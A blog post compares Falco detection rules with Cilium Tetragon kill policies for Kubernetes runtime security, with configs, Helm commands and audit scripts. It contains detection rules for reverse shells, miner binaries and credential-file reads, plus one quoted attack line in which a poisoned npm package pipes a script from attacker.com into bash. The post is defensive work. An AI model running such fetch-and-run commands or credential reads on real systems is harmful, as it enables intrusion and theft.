DEV Community

Yash Pritwani

Posted on • Originally published at techsaas.cloud

Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security

Originally published on TechSaaS Cloud


Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.

Detection without enforcement is just expensive logging.

Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.

How They Actually Work

Both tools use eBPF, but in very different ways.

Falco hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a detection tool -- it tells you something happened.

Tetragon hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take enforcement actions inline, before the syscall returns to userspace. It can send SIGKILL (or another signal) to the offending process, or override the return value of the hooked function so the call fails. The process doesn't get to finish what it started.

The architectural difference:

Falco:    syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert

That "human decides" gap in the Falco pipeline? That's where breaches happen.

Setting Up Falco for Real Detection

Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:

# falco-custom-rules.yaml
- rule: Reverse Shell Detected
  desc: Detect outbound network connections opened by a shell inside a container
  # Match on the connect() syscall: that is the event that carries the
  # socket (fd.*) fields, whereas a process-spawn event does not.
  condition: >
    evt.type = connect and
    container and
    proc.name in (bash, sh, dash, zsh) and
    fd.type in (ipv4, ipv6)
  output: >
    Reverse shell detected (container=%container.name
    command=%proc.cmdline connection=%fd.name
    user=%user.name image=%container.image.repository)
  priority: CRITICAL
  tags: [network, process, attack]

- rule: Crypto Miner Binary
  desc: Known crypto mining process names
  condition: >
    spawned_process and container and
    proc.name in (xmrig, minerd, minergate, cpuminer, 
                  kdevtmpfsi, kinsing)
  output: >
    Crypto miner detected (container=%container.name 
    process=%proc.name image=%container.image.repository)
  priority: CRITICAL
  tags: [process, crypto, attack]

- rule: Sensitive File Read in Container
  desc: Reading sensitive files that containers shouldn't touch
  condition: >
    open_read and container and
    (fd.name startswith /etc/shadow or
     fd.name startswith /etc/kubernetes/pki or
     fd.name startswith /run/secrets/kubernetes.io)
  output: >
    Sensitive file read (file=%fd.name container=%container.name
    command=%proc.cmdline)
  priority: WARNING
  tags: [filesystem, sensitive]

Deploy with Helm:

helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco \
  --namespace falco-system --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.alertmanager.hostport="http://alertmanager:9093" \
  --set-file 'customRules.falco-custom-rules\.yaml=/path/to/falco-custom-rules.yaml'

Setting Up Tetragon for Enforcement

Now the enforcement side. Tetragon uses TracingPolicy custom resources to define what to monitor and how to respond:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: kill-reverse-shells
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
                - /bin/dash
                - /usr/bin/bash
                - /usr/bin/sh
          matchActions:
            - action: Sigkill
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"

This policy says: if bash, sh, or dash attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.
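
One thing worth checking before relying on this policy: as far as I understand it, matchBinaries with the In operator compares against the full paths listed, so a shell installed at another path (or a shell that isn't listed at all, such as zsh) would not match. Here's a minimal Python sketch for auditing the shells found in an image against the policy's list. The `shells_in_image` inventory is hypothetical sample input, not output from any tool.

```python
# Paths copied from the kill-reverse-shells TracingPolicy above.
POLICY_BINARIES = {
    "/bin/bash",
    "/bin/sh",
    "/bin/dash",
    "/usr/bin/bash",
    "/usr/bin/sh",
}


def uncovered_shells(paths_in_image):
    """Return shell paths that the policy's exact-match list would not catch."""
    return sorted(p for p in paths_in_image if p not in POLICY_BINARIES)


# Hypothetical inventory of shell binaries found in one container image.
shells_in_image = ["/bin/sh", "/bin/zsh", "/usr/bin/dash", "/bin/bash"]

if __name__ == "__main__":
    for path in uncovered_shells(shells_in_image):
        print(f"not covered by policy: {path}")
```

Anything this prints is a path to add under matchBinaries before you treat the policy as complete.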

A more nuanced policy for file access:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: protect-sensitive-files
spec:
  kprobes:
    - call: "security_file_open"
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
            - index: 0
              operator: Prefix
              values:
                - /etc/shadow
                - /etc/kubernetes/pki
          matchActions:
            - action: Sigkill
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"

Deploy Tetragon:

helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon \
  --namespace kube-system \
  --set exportDirectory=/var/run/cilium/tetragon \
  --set tetragon.exportFilename=tetragon.log \
  --set tetragon.enablePolicyFilter=true \
  --set tetragon.enableMsgHandlingLatency=true
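
The export file is JSON lines, one event per line, which makes it easy to check what enforcement is actually doing. Here's a rough Python sketch that counts SIGKILL actions per policy and binary. The field names (`process_kprobe`, `action`, `policy_name`, `process.binary`) are my understanding of the export format and should be checked against your Tetragon version; the sample lines are hand-written, not real output, and `observe-connects` is a made-up policy name.

```python
import json
from collections import Counter


def count_kills(lines):
    """Count SIGKILL enforcement events per (policy, binary) pair."""
    kills = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate a partially written last line
        if not isinstance(event, dict):
            continue
        kprobe = event.get("process_kprobe") or {}
        if kprobe.get("action") != "KPROBE_ACTION_SIGKILL":
            continue
        binary = (kprobe.get("process") or {}).get("binary", "unknown")
        policy = kprobe.get("policy_name", "unknown")
        kills[(policy, binary)] += 1
    return kills


# Hand-written sample lines in the assumed export shape (not real output).
SAMPLE = [
    '{"process_kprobe": {"process": {"binary": "/bin/bash"}, '
    '"function_name": "tcp_connect", "action": "KPROBE_ACTION_SIGKILL", '
    '"policy_name": "kill-reverse-shells"}}',
    '{"process_kprobe": {"process": {"binary": "/usr/bin/curl"}, '
    '"function_name": "tcp_connect", "action": "KPROBE_ACTION_POST", '
    '"policy_name": "observe-connects"}}',
    '{"process_exec": {"process": {"binary": "/bin/bash"}}}',
]

if __name__ == "__main__":
    for (policy, binary), n in count_kills(SAMPLE).items():
        print(f"{policy}: killed {binary} x{n}")
```

To run it against a real export, pass an open file handle instead of `SAMPLE`; the function only needs an iterable of lines.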

Real Attack Scenario: The Compromised npm Package

Let's walk through a realistic attack and see how each tool responds.

The attack: A developer installs a compromised npm package that, on import, spawns a child process running curl attacker.com/shell.sh | bash.

Falco response:

  1. Detects bash spawned as child of node (rule: "Shell Spawned by Non-Shell Program")
  2. Detects outbound network connection from bash (rule: "Reverse Shell Detected")
  3. Sends alert to Slack + Alertmanager
  4. Total time from exploit to alert: ~800ms
  5. Total time from exploit to human response: 3-47 minutes (depending on alerting pipeline and on-call response)
  6. The shell has been running the entire time

Tetragon response:

  1. bash spawned as child of node -- logged but allowed (process spawn is legitimate in many apps)
  2. bash attempts TCP connection -- SIGKILL sent in ~3 microseconds
  3. Process dies. Connection never established.
  4. Event exported for audit trail
  5. Total time from exploit to containment: <1ms

The attacker got nothing. Not a single byte of data exfiltrated.
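
To put the two timelines side by side, here's the arithmetic as a small Python sketch. It uses only the figures quoted above and treats Tetragon's "<1ms" as a 1 ms upper bound, so the ratios are lower bounds; the constant and function names are mine.

```python
# Figures quoted in the walkthrough above, converted to microseconds.
FALCO_BEST_US = 3 * 60 * 1_000_000    # 3 minutes from exploit to human response
FALCO_WORST_US = 47 * 60 * 1_000_000  # 47 minutes from exploit to human response
TETRAGON_US = 1_000                   # "<1ms", treated here as an upper bound


def exposure_ratio(detect_only_us, enforce_us):
    """How many times longer the shell stays alive without enforcement."""
    return detect_only_us // enforce_us


if __name__ == "__main__":
    print(exposure_ratio(FALCO_BEST_US, TETRAGON_US))   # best-case on-call response
    print(exposure_ratio(FALCO_WORST_US, TETRAGON_US))  # worst-case on-call response
```

Even with a fast on-call response, the detection-only window comes out at least 180,000 times longer than the enforcement window.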

Performance Impact

Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):

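| Metric                     | No security | Falco  | Tetragon | Both   |
|----------------------------|-------------|--------|----------|--------|
| CPU overhead (per node)    | baseline    | +1.8%  | +0.9%    | +2.5%  |
| Memory overhead (per node) | baseline    | +180MB | +95MB    | +260MB |
| Syscall latency (p99)      | baseline    | +2.1μs | +0.8μs   | +2.7μs |
| Network latency (p99)      | baseline    | +0.3μs | +0.2μs   | +0.4μs |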

Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.

Both tools are light enough to run simultaneously without meaningful production impact.
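
A quick sanity check on the "Both" column: in every row the combined overhead is slightly lower than the sum of the two individual overheads. The Python sketch below just redoes that arithmetic from the table; it doesn't explain why the numbers come out that way, and the function name is mine.

```python
# Rows copied from the table above, as (Falco, Tetragon, Both).
MEASURED = {
    "cpu_pct": (1.8, 0.9, 2.5),
    "memory_mb": (180, 95, 260),
    "syscall_p99_us": (2.1, 0.8, 2.7),
    "network_p99_us": (0.3, 0.2, 0.4),
}


def saved_by_combining(falco, tetragon, both):
    """Sum of the individual overheads minus the measured combined overhead."""
    return round(falco + tetragon - both, 2)


if __name__ == "__main__":
    for metric, row in MEASURED.items():
        individual_sum = round(row[0] + row[1], 2)
        print(f"{metric}: sum={individual_sum} both={row[2]} "
              f"diff={saved_by_combining(*row)}")
```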

When to Use Which (Or Both)

Use Falco when:

  • You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)
  • You want visibility into container behavior before writing enforcement policies
  • Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)
  • You're just starting with runtime security and need to understand your baseline

Use Tetragon when:

  • You know what should never happen and want to prevent it, not just detect it
  • You need sub-millisecond response to threats
  • You're running Cilium for networking (Tetragon integrates natively)
  • You want enforcement at the kernel level without a userspace bottleneck

Use both when:

  • You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious
  • Compliance requires both prevention and audit trails
  • You're running a high-security workload (financial services, healthcare)

Our Recommended Architecture

For most production Kubernetes clusters, we deploy both:

┌─────────────────────────────────────────────┐
│ Kernel Level                                │
│  Tetragon eBPF → ENFORCE known threats      │
│  Falco eBPF    → DETECT suspicious activity │
└──────────────┬──────────────┬───────────────┘
               │              │
        ┌──────▼──────┐ ┌─────▼─────────┐
        │ Tetragon    │ │ Falco         │
        │ Export JSON │ │ Sidekick      │
        └──────┬──────┘ └─────┬─────────┘
               │              │
        ┌──────▼──────────────▼───────────┐
        │ Loki / Elasticsearch            │
        │ (unified security event store)  │
        └──────────────┬──────────────────┘
                       │
        ┌──────────────▼──────────────────┐
        │ Grafana Dashboards + Alerts     │
        └─────────────────────────────────┘

Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).

The Migration Path

If you're running Falco today and considering Tetragon:

  1. Deploy Tetragon in observe-only mode (no Sigkill actions) alongside Falco
  2. Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.
  3. Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)
  4. Gradually move more rules to enforcement as confidence grows
  5. Keep Falco for detection of novel threats that don't match enforcement patterns

Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.
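
For step 2, the comparison can start as a simple script. Here's a rough Python sketch that reads Falco's JSON alerts and Tetragon's JSON export, then lists, per Falco rule, the containers where Falco alerted but Tetragon logged no kprobe event. It assumes Falco is emitting JSON with `rule` and `output_fields`, and that Tetragon events carry `process_kprobe.process.pod.container.name`; verify both against your versions. It matches on container name only and ignores timestamps, so treat the result as a first pass. The sample lines are hand-written, not real output.

```python
import json
from collections import defaultdict


def _load(lines):
    """Yield one dict per valid JSON line, skipping blanks and garbage."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict):
            yield obj


def falco_containers_by_rule(lines):
    """Map each Falco rule name to the set of containers it alerted on."""
    by_rule = defaultdict(set)
    for alert in _load(lines):
        container = (alert.get("output_fields") or {}).get("container.name")
        if container:
            by_rule[alert.get("rule", "unknown")].add(container)
    return by_rule


def tetragon_containers(lines):
    """Return the set of containers that produced any kprobe event."""
    seen = set()
    for event in _load(lines):
        process = (event.get("process_kprobe") or {}).get("process") or {}
        container = (process.get("pod") or {}).get("container") or {}
        if container.get("name"):
            seen.add(container["name"])
    return seen


def coverage_gaps(falco_lines, tetragon_lines):
    """Per Falco rule, containers where Falco alerted but Tetragon saw nothing."""
    seen = tetragon_containers(tetragon_lines)
    gaps = {}
    for rule, containers in falco_containers_by_rule(falco_lines).items():
        missing = sorted(containers - seen)
        if missing:
            gaps[rule] = missing
    return gaps


# Hand-written samples in the assumed shapes (not real output).
FALCO_SAMPLE = [
    '{"rule": "Reverse Shell Detected", '
    '"output_fields": {"container.name": "api"}}',
    '{"rule": "Crypto Miner Binary", '
    '"output_fields": {"container.name": "worker"}}',
]
TETRAGON_SAMPLE = [
    '{"process_kprobe": {"function_name": "tcp_connect", "process": '
    '{"binary": "/bin/bash", "pod": {"container": {"name": "api"}}}}}',
]

if __name__ == "__main__":
    for rule, containers in coverage_gaps(FALCO_SAMPLE, TETRAGON_SAMPLE).items():
        print(f"{rule}: no Tetragon events in {', '.join(containers)}")
```

Any rule that shows up in the output is one where the Tetragon policies don't yet see what Falco sees, so it isn't ready to move to enforcement.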


Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. Get in touch if you want to stop detecting breaches and start preventing them.
